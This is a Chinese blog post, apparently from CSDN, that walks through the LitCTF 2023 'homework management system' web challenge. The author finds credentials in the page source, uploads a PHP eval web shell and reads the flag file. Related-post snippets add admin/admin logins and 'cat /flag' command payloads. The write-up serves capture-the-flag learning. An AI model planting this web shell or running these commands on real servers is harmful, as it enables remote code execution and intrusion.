[LitCTF 2023]作业管理系统

最新推荐文章于 2024-04-08 07:33:43 发布
最新推荐文章于 2024-04-08 07:33:43 发布
阅读量49 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80059204/article/details/135004645
版权

[LitCTF 2023]作业管理系统

打开靶机之后,让我输入账户信息,开始以为是SQL注入的万能密码,试了一下,没有成功,

查了一下页面源代码,得到账户信息

看见有一个文件上传的,就试着上传一句话木马

<?php @eval($_POST['cmd']);?>

上传成功,那直接去用意见链接

注意一下URL地址,是我们上传木马文件的地址,查找根目录就可以一看到flag文件,得到flag

Lnre
关注
[LitCTF 2023]作业管理系统 - 文件上传+弱口令
oZuoShen123的博客
10-09 325
1、F12看到页面源代码有注释:默认账户admin admin   使用:admin-admin 可直接登录 2、上传一句话木马
【愚公系列】2023年06月 网络安全高级班 102.CTF黑客比赛(我和我的女友靶机)
时光隧道
06-06 4144
ModHeader是一个浏览器扩展程序,可以让用户自定义请求头,修改HTTP请求的头信息,包括添加、修改和删除。它可以用于测试和调试Web应用程序,定制HTTP请求头,模拟发送HTTP请求,并查看HTTP响应。在Web开发中,ModHeader可以用于模拟不同的HTTP请求,如GET、POST等,以及设置不同的请求头,如Content-Type、User-Agent等。同时,ModHeader还可以通过导入和导出功能,方便地分享配置文件。
2023LitCTF web组wp
m0_74160536的博客
05-17 1266
1、导弹迷踪2、1zjs3、php是世界上最好的语言!!4、Ping5、我Flag呢?7、作业管理系统8、Vim yyds10、这是什么?SQL!注一下!11、Flag点击就送!12、就当无事发生13、彩蛋。
LitCTF(MISC部分)
05-14
Litctf赛后wp(misc部分)
LitCTF部分WP
qq_44209092的博客
05-21 340
LitCTF部分WP
LitCTF 2023]作业管理系统(1),2024年网络安全开发学习路线
m0_60453176的博客
04-08 1001
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
LitCTF 2023]作业管理系统,附答案
m0_60666452的博客
04-06 561
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Litctf——作业管理系统
m0_74093152的博客
05-21 548
访问1.php文件后,将命令system("cat /f*");赋给变量A,然后postA,获得flag。登录页面,查看源代码,找到账号密码。上传一句话木马,进行访问就可以使用。登录后,显示文件上传界面。
LitCTF2023 Writrup W4ntY0u
weixin_52365980的博客
05-15 633
经过三天三夜的激烈交战W4ntY0u战队拿下本次比赛第16名的成绩,辛苦师傅们啦!,覆盖Web、Reverse、Pwn、Misc、Crypto、等主流赛题方向,面向国内所有个体及团队。
LitCTF-2023-web部分
m0_74097148的博客
05-18 2000
也有多种解法,当然如果上传有黑名单限制 但是远程下载没有 则可以用远程下载去下载PHP木马文件,然后剩余的步骤和上传木马的操作一样 不多做说明。并且题目提示我们只有username, password两列, 不需要group by去判断列数了。输入如下图的内容, 下载后点击编辑文件即可看到flag。如果想要了解更多关于http头部的信息可以参考。
LitCTF2023 郑州轻工业大学首届网络安全赛 WP 部分
Aluxian_的博客
05-14 8290
由于刚接触CTF没多久 还是属于萌新级别的(中专高中生)也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。PS:记得所有的flag都改为NSSCTF或者LitCTF
[LitCTF 2023]WEB刷题记录
m0_73239569的博客
11-23 377
在使用vim时会创建临时缓存文件,关闭vim时缓存文件则会被删除,当vim异常退出后,因为未处理缓存文件,导致可以通过缓存文件恢复原始文件内容。分析之后就可以构造出payload: cmd=cat /flag&password=R2l2ZV9NZV9Zb3VyX0ZsYWc=题目给我们了,直接去探姬的博客里找flag,点进去,在local-search.xml中。发现2个参数,一个参数是cmd 一个参数是password 然后返回数据。然后用post传参就可以得到flag。打开环境,需要我们登录。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8543
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【重磅,更新!】2002-2021年中国31省份经济韧性测度三级指标数据合集(各省、市、企业等)
最新发布
11-12
1、资源内容地址:https://blog.csdn.net/abc6838/article/details/143720369 2、数据特点:今年全新,手工精心整理,放心引用,数据来自权威,且标注《数据来源》,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 4、课程引用: 经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值